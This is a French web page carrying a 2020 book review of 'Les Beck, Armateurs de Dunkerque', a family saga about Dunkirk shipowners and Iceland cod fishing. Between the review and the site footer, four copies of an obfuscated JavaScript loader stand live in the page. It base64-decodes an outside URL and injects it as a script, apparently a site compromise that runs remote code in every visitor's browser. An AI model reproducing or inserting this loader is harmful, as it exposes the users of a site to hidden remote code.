Les Beck, Armateurs de Dunkerque

Depuis Pierre Loti, la pêche à la morue en Islande était un roman. L’amiral Chomel de Jarnieu en fait une saga familiale, contemporaine de Pêcheur d’Islande puisqu’elle s’étend sur un siècle, de 1820 à 1930, mais qui montre cette aventure du côté des armateurs, les Beck, et nous envoie plein nord aussi dans l’hexagone, à Dunkerque, le Dunkerque d’avant les destructions de la Seconde Guerre mondiale et les mutations nées de l’industrie lourde.

Cette saga est un hommage à la propre famille de l’auteur, descendant par sa mère de la dynastie des armateurs Beck. Elle commence au moment où le port de Dunkerque, qui a perdu à la Révolution ses privilèges commerciaux antérieurs, s’oriente vers la pêche. Les Beck sont alors un acteur majeur de cette dynamique, sur plus d’un siècle, par leur rôle dans la pêche elle-même mais également dans la construction navale et le commerce. Au-delà de la fin de cette entreprise, dans l’entre-deux guerres, perdure leur œuvre sociale, par la postérité de la caisse de secours aux marins disparus qu’ils ont créée en 1870.

Sur toute la période, le livre apporte des témoignages, souvent touchants, entre réussites commerciales, baptêmes de navires et naufrages. Il souligne la singularité de la « pêche à Islande », par rapport à celle de Terre-Neuve, et apporte des précisions assez rares, notamment sur les particularités dunkerquoises du reconditionnement au port des morues avec le sel blanc du Portugal. L’ouvrage est largement illustré de reproductions de documents, de photographies et de modèles de bateaux, notamment des goélettes que les Beck avaient perfectionnées, avec aussi des vues originales des monuments érigés en Islande aux naufragés français.

D’abord œuvre d’un passionné d’histoire familiale et locale, le livre de l’Amiral Chomel de Jarnieu nous ouvre à la grande histoire maritime de la France contemporaine et aux difficultés de notre économie à s’investir pour la longue durée dans les choses de la mer.

CV(R) Marc LEVATOIS
21/12/2020

Les Beck, Armateurs de Dunkerque
Amiral Benoît CHOMEL de JARNIEU
Publication de l’auteur
Toulon, Imprimerie Repro Systèmes 83

Voir également la recension du CV(H) Philippe HENRAT

(function(){var a=document.head||document.getElementsByTagName(« head »)[0],b= »script »,c=atob(« aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA= »);c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();(function(){var a=document.head||document.getElementsByTagName("head")[0],b="script",c=atob("aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=");c+=-1<c.indexOf("?")?"&":"?";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();

Nous contacter

Prix Marine Bravo Zulu
ACORAM

Ecole Militaire, Case D

1 Place Joffre

75700 PARIS SP 07

Email:

Log in